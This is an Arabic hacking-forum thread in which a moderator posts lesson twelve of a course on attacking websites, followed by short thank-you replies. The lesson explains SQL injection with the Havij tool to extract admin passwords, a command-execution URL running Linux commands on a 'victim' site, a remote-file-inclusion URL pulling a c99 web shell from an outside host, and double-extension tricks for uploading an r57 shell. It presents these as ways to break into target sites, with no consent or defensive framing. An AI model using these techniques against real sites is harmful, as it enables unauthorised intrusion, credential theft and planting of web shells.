اشترك في قناتنا ليصلك جديدنا

اشترك في قناتنا على اليوتيوب ليصلك جديدنا

كذلك الاعجاب بصفحتنا على الفيسبوك

|ألدرس الثاني عشر| الثغرات وانواعها + حديث عنها

|ألدرس الثاني عشر| الثغرات وانواعها + حديث عنها


صفحة 1 من 3 123 الأخيرةالأخيرة
النتائج 1 إلى 10 من 23

الموضوع: |ألدرس الثاني عشر| الثغرات وانواعها + حديث عنها

  1. #1
    :: مشرف عام :: Array الصورة الرمزية QtRoNiX FoX
    تاريخ التسجيل
    Dec 2011
    الدولة
    فلسطين
    المشاركات
    813

    Post |ألدرس الثاني عشر| الثغرات وانواعها + حديث عنها



    بسم الله الرحمن الرحيم
    السلام عليكم ورحمة لله وبركاتة
    الصلاة والسلام على اشرف المرسلين وخاتم الانبياء سيدنا محمد


    درسنا اليوم هو انواع الثغرات وشرحها ..

    على بركة الله

    كيف يتم رفع الشيل ؟؟
    رفع الشل يتم عن طريق اكتشاف ثغرة معينة تمكننا من رفع الشل
    يعني الشل يتم رفعة عن طريق ثغرة.
    وللثغرات انواع كثيرة, وطرق اكتشافها كثير جدا جدا.



    ما هي الثغرة ؟؟
    الثغرة هي خطء برمجي يقع فيه المبرمج اثناء برمجتة لشيء.



    ولكي تتمكن من استهداف موقع معين يجب عليك البحث عن ثغرات لكي تتمكن من رفع الشل وتخترق موقع الهدف.
    وليس شرطا ان تكون هذه الثغرات داخل موقع الهدف.!
    يعني لو كان الموقع المستهدف ما فية ثغرات نتركة مثلا ؟!؟
    بالطبع لا.
    بعد ان قمنا بجمع معلومات عن موقع الهدف (الي تحدثنا عنها بدرسنا السابق) هذه المعلومات هي التي ستساعدنا وتوصلنا الى اختراق الموقع

    كيف ذلك ؟؟
    لنفترض انه موقع الهدف ما فيه ثغرات اوك ؟
    طيب الان بعد ان انتهينا من جمع معلومات عن موقع الهدف
    مثل: مواقع السيرفر، استضافة السيرفر، IP السيرفر ...الخ
    هؤلاء هم من سيمكنوننا من دعس موقع الهدف

    تقلي كيف ذلك ؟؟
    اقلك راجع الدرس السابق, تعرف
    لانه هذا كلة حكيتة بالدرس السابق وما بدي ارجع احكية كمان مرة
    مش لاني بدي اختصر
    بس لاني لو اسا بدي احكيلكم كيف نستفيد من المعلومات الي جمعناها رح يكون نفس الحكي الي حكيتة بالدرس السابق.
    لهيك راجع الدرس السابق الله يستر عليك



    طيب يلا نبدء بالتحدث على بعض انواع الثغرات ونشرحها


    1- sql injection | سكيول انجكشن | أس كيو أل انجكشن | ثغرات الحقن.

    ما هي هذه الثغرة, وما هو مفعولها ؟؟
    هذه الثغره روعة لانها الاكثر انتشار في هذه الايام وضروري جدا جدا ان تتعلمها لانها تفيدك كثير وتحتاجها كثير
    هذه الثغره ليس مثل باقي الثغرات, يعني ثغرات الحقن SQL Injection تختلف عن باقي انواع الثغرات.
    لانك تحتاج الى خبرة لكي تتمكن من استغلال هذه الثغرات

    مفعولها:: بعد حقنك للموقع المصاب>> ستتمكن من سحب يوزر وباسوورد الادمن, وغالبا تكون مشفر.
    تفضلو هذه دورة اسديلي لتعليم ثغرات الحقن sql injection
    http://www.aljyyosh.com/vb/forumdisplay.php?f=76

    وكذلك يوجد برامج لاستغلال هذه الثغرات, ومن اشهر واقوى البرامج لاستغلال ثغرات الحقن برنامج هافج Havij



    2- Command Execution | ثغرة الكوماند | تنفيذ الاوامر.

    ما هي هذه الثغرة, وما هو مفعولها ؟؟
    هي الثغره جميله جدا. تمكنك من تنفيذ اوامر الينكس مباشر على الموقع دون حاجة للشل, وهذه الثغرة تعد من اخطر الثغرات
    مثال على الثغرة:
    كود:
    www.site.com/qtronix.php?fox=ls -la
    نشرحها.
    www.site.com: موقع الضحية او الموقع الي يتواجد بداخلة او يملك الثغرة.
    qtronix.php?: اسم الملف المصاب بالثغرة.
    fox=: المتغيير المصاب والي رح يتم تنفيذ اوامر الينكس عليه.
    ls -la: امر من اوامر الينكس
    وظيفتة: يعرض لك جميع الملفات والمجلدات + تصاريحها + وقت انشائها ..الخ

    وبالنسبة لاوامر الينكس, سبق وتحدثنا عنها وشرحناها بالتفضيل الممل وبالفيديو.
    وبأمكانك مراجعة درس اوامر الينكس من هنا

    القسم الاول
    http://www.aljyyosh.com/vb/showthread.php?t=33974
    القسم الثاني
    http://www.aljyyosh.com/vb/showthread.php?t=33977



    3-Remote File Inclusion | ثغرات فايل انكلود.

    ما هي هذه الثغرة, وما هو مفعولها ؟؟
    ثغرة رائعة وجميلة جدا وايضا هذة تعد من اخطر الثغرات.
    تمكنك من رفع شل مباشر على الموقع, كل ما تحتاجه هو فقط شل بأمتداد txt مرفوع على موقع.
    مثال على الثغرة:
    كود:
    http://www.site.com/qtronix.php?fox=http://www.sh3ll.org/c99.txt?
    نشرحها.
    www.site.com: موقع الضحية او الموقع الي يتواجد بداخلة او يملك الثغرة.
    qtronix.php?: اسم الملف المصاب بالثغرة.
    fox=: المتغيير المصاب والذي ستم وضع رابط الشل الي بامتداد txt عليه.
    http://www.sh3ll.org/c99.txt?: هذا هو رابط الشل الي بامتداد txt, ويجب وضع علامة السؤال [؟] في نهاية رابط الشل عشان يستعرض معك الشل ..



    4- Remote File Upload | ريموت فايل ابلود | ثغرة الرفع | ثغرة الابلود.

    ما هي هذه الثغرة, وما هو مفعولها ؟؟
    ثغرة رائعة وجميلة جدا وايضا هذة الثغرة تعد من اخطر الثغرات, تمكنك من رفع الشل.

    تتواجد هذه الثغرات في مراكز الرفع ..
    طبعا لن تكون هذه الثغرة في جميع مراكز الرفع.! بالطبع لا. اسمها ثغرة, (يعني خطء برمجي / غباء من المبرمج)
    يوجد مراكز رفع تسمح لك برفع ملفات بامتداد PHP
    وفي حال ما رفع معك ملف الـ PHP (الشل), بأمكانك ان تقوم بتغيير امتداد الشل الى صيغة صورة او تضغطه بالـ WinRAR ..
    مثال:
    r57.php.zip / r57.php.rar / r57.php.jpg ...

    وفي حال ما ضبطو معك الطريقتين.. معناته المركز ما فيه ثغرة الريموت فايل ابلود, Remote File Upload



    انتهى الدرس
    اتمنى انه قد كان درس واضح ومفهوم للجميع..
    ولا تنسو من صالح دعائكم..

    تحياتي ..
    اخوكم QtRoNiX FoX


    التعديل الأخير تم بواسطة QtRoNiX FoX ; 08-25-2013 الساعة 06:42 PM


  2. #2
    هكر مجتهد Array الصورة الرمزية اخلاقي تاج راسي
    تاريخ التسجيل
    Apr 2010
    المشاركات
    273

    افتراضي رد: ~الدرس العاشر~ طرق استهداف المواقع - الجزء الثاني [الثغرات وانواعها + حديث عنها]


    ربي يعطيكـ العافيه
    يا خي كل يوم أدخل المنتدى و اشوف نزل الدرس العاشر ولا لا
    ههههه
    متابع دروسكـ اول بأول بس يا ليت ما تتأخر
    آحي ان جاتني نفسية هههه
    الا على طاري الدروس السابقه ترا تم حفظها بنكـكـ القديم
    أستمر يآ كنق
    تحيايتي


  3. #3
    :: مشرف عام :: Array الصورة الرمزية QtRoNiX FoX
    تاريخ التسجيل
    Dec 2011
    الدولة
    فلسطين
    المشاركات
    813

    افتراضي رد: ~الدرس العاشر~ طرق استهداف المواقع - الجزء الثاني [الثغرات وانواعها + حديث عنها]

    اقتباس المشاركة الأصلية كتبت بواسطة اخلاقي تاج راسي مشاهدة المشاركة

    ربي يعطيكـ العافيه
    يا خي كل يوم أدخل المنتدى و اشوف نزل الدرس العاشر ولا لا
    ههههه
    متابع دروسكـ اول بأول بس يا ليت ما تتأخر
    آحي ان جاتني نفسية هههه
    الا على طاري الدروس السابقه ترا تم حفظها بنكـكـ القديم
    أستمر يآ كنق
    تحيايتي
    هلا 'اخلاقي'
    والله يالغالي انشغالات كثيرة وما بفضى كثير
    بس هاي المرة كان الدرس جاهز من زمان بس ما كنت بغضر انزله لانه صارت لخبطة صغيرة
    عدلت على جميع دروس الدورة وامبيرح لحتى انتهيت من التعديل واليوم لحتى فضيت انزل الدرس ...
    على كل حال منور يالغالي ومشكور على ردك
    تحياتي..
    بالتوفيق ان شاء الله.

    التعديل الأخير تم بواسطة QtRoNiX FoX ; 09-19-2012 الساعة 03:13 PM


  4. #4
    هكر مبتديء Array الصورة الرمزية Tannous
    تاريخ التسجيل
    Jul 2012
    الدولة
    فلسطين
    المشاركات
    44

    افتراضي رد: |ألدرس الثاني عشر| الثغرات وانواعها + حديث عنها

    مشكووووووووووووور


  5. #5
    هكر مبتديء Array الصورة الرمزية feras2010
    تاريخ التسجيل
    Aug 2009
    المشاركات
    70

    افتراضي رد: |ألدرس الثاني عشر| الثغرات وانواعها + حديث عنها

    واصل بدون فواصل يا غالي


  6. #6
    هكر مبتديء Array الصورة الرمزية هكر فاضي
    تاريخ التسجيل
    Sep 2010
    الدولة
    عالم لا رحمة فيه
    المشاركات
    95

    افتراضي رد: |ألدرس الثاني عشر| الثغرات وانواعها + حديث عنها

    مشكور عالشرح الجميل يعطيك العافية



  7. #7
    هكر متميز Array الصورة الرمزية Marobuh Maroc
    تاريخ التسجيل
    Nov 2011
    المشاركات
    664

    افتراضي رد: |ألدرس الثاني عشر| الثغرات وانواعها + حديث عنها

    مشكوووووور اخي . رااااااااااااااااءع


  8. #8
    هكر مجتهد Array الصورة الرمزية dark haCk
    تاريخ التسجيل
    Apr 2012
    الدولة
    في قلب الحـــــــدث
    المشاركات
    288

    افتراضي رد: |ألدرس الثاني عشر| الثغرات وانواعها + حديث عنها

    يعطيك الف عافية ياغالي ~>ربي يحفظك من كل شر ع المجهود اللي تبذله وشروحاتك الرائعة


  9. #9
    هكر مبتديء Array الصورة الرمزية tfather71
    تاريخ التسجيل
    Sep 2011
    الدولة
    سوريا _دمشق
    المشاركات
    38

    افتراضي رد: |ألدرس الثاني عشر| الثغرات وانواعها + حديث عنها

    مشكور شرح رائع حبيبي



  10. #10
    هكر نشيط Array الصورة الرمزية flashmen
    تاريخ التسجيل
    Jul 2012
    المشاركات
    123

    افتراضي رد: |ألدرس الثاني عشر| الثغرات وانواعها + حديث عنها

    بارك الله فيك اخي


صفحة 1 من 3 123 الأخيرةالأخيرة

المواضيع المتشابهه

  1. |ألدرس الحادي عشر| طرق استهداف المواقع - جمع معلومات عن الموقع المستهدف
    بواسطة QtRoNiX FoX في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 50
    آخر مشاركة: 05-16-2014, 07:56 PM
  2. الدرس الثالث: خطوات استهداف المواقع .. الجزء الاول
    بواسطة ASDELY-ScOrPiOn في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 82
    آخر مشاركة: 04-30-2012, 04:12 AM
  3. الدرس ( 4 ) - [ صندوق الأدوات - الجزء الثاني ]..
    بواسطة Mostafa.X في المنتدى منتدى الإستايلات والتصاميم
    مشاركات: 4
    آخر مشاركة: 11-17-2011, 03:38 PM
  4. الدرس العاشر: استغلال الثغرات المكتوبة بلغة html
    بواسطة ASDELY-ScOrPiOn في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 30
    آخر مشاركة: 01-21-2011, 02:25 AM

وجد الزوار هذه الصفحة بالبحث عن:

ثغرات sip

شرح بحث عن ثغرات في موقع معين

انواع ثغرات المواقع

التعليم التمكن من ثغرة SQL Injection

شرح البحث عن ثغرات لموقع معين

اكتشاف الثغرات في موقع معين

شرح حقن المنتدى ورفع الشل من الثغرات وتهكير المنتديات

ثغرة sip

كشف ثغرات الابلود برمجيا

ثغرة الرفع

ماهي الثغرات وكيف يتم اكتشافها

انواع ثغرات سيكول انجيكشن

دعس موقع مستهدف

ثغرات Phpfox

الثغرات التي تخترق بال-havij

كيفية رفع الشل بمواقع الإستضافة

ثغرة رفع الشل

كيف يمكننى اكتشاف ثغره بموقع

ثغرة اختراق sip

ثغرات الرفع

ما هي تغرة الحقن شرحها

اختراق موقع ورفع الشل ب havij

كيف يتم اكتشاف ثغرات موقع معين

ثغرات موقع php

تحميل برنامج هكر السكول انجيكشن الخاص بال

الكلمات الدلالية لهذا الموضوع

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •